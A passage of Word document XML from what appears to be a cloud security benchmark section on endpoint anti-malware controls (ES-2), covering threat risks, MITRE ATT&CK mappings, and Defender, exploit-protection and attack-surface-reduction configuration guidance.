      </w:r>
    </w:p>
    <w:p w14:paraId="14641CB4" w14:textId="16DE6BF5" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Enrich threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72D0BC" w14:textId="6B1E9E9E" w:rsidR="00E720FA" w:rsidRDefault="00E720FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E720FA">
        <w:t>Implement automated threat intelligence lookups, file hash analysis, and Azure resource metadata gathering accelerating investigation and response decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DF454" w14:textId="56F246C1" w:rsidR="00751011" w:rsidRDefault="00751011" w:rsidP="00751011">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc242449558"/>
      <w:r w:rsidRPr="00751011">
        <w:lastRenderedPageBreak/>
        <w:t>ES-2: Use modern anti-malware software</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="3EC97579" w14:textId="2D622345" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15503016" w14:textId="2864D8FD" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Deploy modern anti-malware solutions combining signature-based detection with behavioral analytics, machine learning, cloud-delivered intelligence, and exploit prevention to protect against known and unknown threats. Ensure comprehensive malware protection across all endpoint platforms with minimal performance impact and centralized management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548330D7" w14:textId="3288F3A1" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC0847">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A166AC1" w14:textId="5AA9AA9B" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Zero-day exploit vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5AC45" w14:textId="46883794" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Signature-based detection cannot identify new malware variants and zero-day exploits before signatures are created and distributed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26922DAB" w14:textId="30AF9CFE" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Polymorphic malware evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC42EEE" w14:textId="2EBE4F6A" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Advanced malware using polymorphic code, encryption, and obfuscation techniques bypass signature matching and static analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1CED0" w14:textId="77777777" w:rsidR="00530D44" w:rsidRDefault="00530D44" w:rsidP="00530D44"/>
    <w:p w14:paraId="137ABE8E" w14:textId="77777777" w:rsidR="00530D44" w:rsidRDefault="00530D44" w:rsidP="00530D44"/>
    <w:p w14:paraId="59B38339" w14:textId="547CD148" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Fileless attack execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA47FAE" w14:textId="44BD691E" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t xml:space="preserve">Memory-resident attacks executing entirely in RAM without touching </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC0847">
        <w:t>disk</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC0847">
        <w:t xml:space="preserve"> evade traditional file-based scanning mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935CAAC" w14:textId="4952C829" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Ransomware encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55D5DB" w14:textId="71D6A65A" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Modern ransomware variants execute encryption rapidly before signature-based detection can identify and block malicious processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D8F42" w14:textId="287DD883" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Script-based attack delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B81410" w14:textId="23C6F643" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>PowerShell, JavaScript, and other scripting attacks leverage trusted system tools evading application-based anti-malware controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D7C7B" w14:textId="6EA43813" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Performance degradation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1421C3" w14:textId="1E2380CE" w:rsidR="00FC0847" w:rsidRDefault="00FC0847">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0847">
        <w:t>Legacy anti-malware solutions consuming excessive system resources impact endpoint performance and user productivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3FDE1D" w14:textId="6D6C2165" w:rsidR="00530D44" w:rsidRDefault="00530D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D44">
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15C432" w14:textId="4ADD80AC" w:rsidR="00530D44" w:rsidRDefault="00530D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D44">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182BD132" w14:textId="77777777" w:rsidR="00EC40F9" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t xml:space="preserve">malicious file (T1204.002) executing malware payloads delivered through phishing, downloads, or removable media. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C118309" w14:textId="35583B36" w:rsidR="00530D44" w:rsidRDefault="00530D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D44">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B10A88" w14:textId="04539FBA" w:rsidR="00EC40F9" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>obfuscated files or information (T1027) and virtualization/sandbox evasion (T1497) bypassing signature-based detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7051C" w14:textId="6EB30F1C" w:rsidR="00530D44" w:rsidRDefault="00530D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00530D44">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650DF1B" w14:textId="4CFE681C" w:rsidR="00EC40F9" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="438"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>data encrypted for impact (T1486) deploying ransomware encrypting organizational data before detection occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9667B" w14:textId="5A059438" w:rsidR="008B2064" w:rsidRDefault="008B2064" w:rsidP="008B2064">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2064">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ES-2.1: Deploy next-generation anti-malware solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF27DF" w14:textId="6627C1E1" w:rsidR="008B2064" w:rsidRDefault="008B2064">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2064">
        <w:t>Deploy comprehensive malware protection through these defense layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C278DB" w14:textId="3467DC9A" w:rsidR="008B2064" w:rsidRDefault="008B2064">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2064">
        <w:t>Implement Microsoft Defender Antivirus on Azure Virtual Machines providing multi-layered protection including signature-based detection, behavioral analysis, machine learning classification, and exploit prevention capabilities for cloud workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDADAFF" w14:textId="0DCE663D" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Anti-malware configuration best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9FDEA" w14:textId="23333B7C" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Configure protection layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E3E1F" w14:textId="06E80D68" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t xml:space="preserve">Enable all protection layers (signature-based, heuristic, behavioral, cloud-powered ML) by default allowing selective disabling only when specific workload requirements </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>documented</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA19B4">
        <w:t xml:space="preserve"> and approved by security team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962500D" w14:textId="77777777" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4" w:rsidP="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C54942" w14:textId="54186037" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Enable cloud-delivered protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A90DC" w14:textId="3FB21AEC" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Activate cloud protection with automatic sample submission for unknown files except for VMs processing highly sensitive data requiring air-gapped protection models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB6581" w14:textId="6BC4A7D6" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Configure exclusion management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E1D27" w14:textId="3B2E438B" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Establish formal exception process requiring business justification, security review, and time-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA19B4">
        <w:lastRenderedPageBreak/>
        <w:t>limited approvals for anti-malware exclusions minimizing attack surface exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121AF5C" w14:textId="2877A0B7" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Test tamper protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EC4353" w14:textId="7B5DCB6C" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Enable tamper protection on all production VMs and validate effectiveness through controlled testing ensuring anti-malware remains operational during simulated attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BECF3A6" w14:textId="58347CCE" w:rsidR="00FA19B4" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Establish centralized management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0751A" w14:textId="4F7B717E" w:rsidR="00FA19B4" w:rsidRPr="008B2064" w:rsidRDefault="00FA19B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA19B4">
        <w:t>Implement centralized anti-malware management through Microsoft Defender for Cloud and Azure Policy defining organizational baseline configuration and governance workflows for configuration changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFB762" w14:textId="428A4033" w:rsidR="00C47351" w:rsidRDefault="00A369BE" w:rsidP="00A369BE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ES-2.2: Enable advanced threat protection features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9127E0" w14:textId="21CB12BE" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Prevent exploitation techniques through these advanced protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B5F76" w14:textId="3FF577D9" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Configure advanced protection features including exploit protection, attack surface reduction, controlled folder access, and network protection to prevent exploit techniques and reduce attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216B70A" w14:textId="4420D438" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Exploit protection configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D920A88" w14:textId="2EDE447C" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t xml:space="preserve">Enable memory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A369BE">
        <w:t>protections</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C190484" w14:textId="240DC945" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Activate Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG) on all Azure VMs testing application compatibility in development environments before production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C5E05" w14:textId="77777777" w:rsidR="00A369BE" w:rsidRDefault="00A369BE" w:rsidP="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8029AB" w14:textId="77777777" w:rsidR="00A369BE" w:rsidRDefault="00A369BE" w:rsidP="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78526B39" w14:textId="77777777" w:rsidR="00A369BE" w:rsidRDefault="00A369BE" w:rsidP="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FCF918" w14:textId="07EC027F" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Configure application-specific protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B15D4" w14:textId="211EDD5D" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Apply targeted exploit protections to high-risk applications (browsers, Office apps, PDF readers) with exceptions documented and reviewed quarterly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B310198" w14:textId="619A1E14" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Test mitigation effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EF0B5" w14:textId="72BEFB90" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t xml:space="preserve">Conduct controlled exploit simulation testing validating protection against common techniques </w:t>
      </w:r>
      <w:r w:rsidRPr="00A369BE">
        <w:lastRenderedPageBreak/>
        <w:t>(heap spraying, ROP, SEH overwrites) adjusting configurations based on result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75016FAA" w14:textId="776E6F7B" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Establish exception process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F95C7A1" w14:textId="15CCF5CB" w:rsidR="00A369BE" w:rsidRDefault="00A369BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A369BE">
        <w:t>Define formal approval workflow for exploit protection exceptions requiring security architect review, business justification, and compensating controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773411BF" w14:textId="0EE01C11" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Attack surface reduction configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DEF53" w14:textId="0595B900" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Deploy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E56C6">
        <w:t xml:space="preserve"> ASR rules progressively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A23FCB" w14:textId="0423C5E0" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Enable attack surface reduction rules in audit mode first analyzing impact for 30 days before switching to block mode starting with low-impact rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF7053C" w14:textId="62E8B08E" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Configure script execution controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C0690" w14:textId="1710F37A" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Block obfuscated JavaScript/VBScript/PowerShell execution from untrusted sources while maintaining documented exceptions for legitimate automation scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE2D816" w14:textId="15FFEF48" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Enable ransomware protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78735619" w14:textId="5854E44F" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Configure controlled folder access protecting critical data folders with approved application list reviewed monthly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899415D" w14:textId="35D1ECB0" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Implement credential protection</w:t>
      </w:r>
    </w:p>
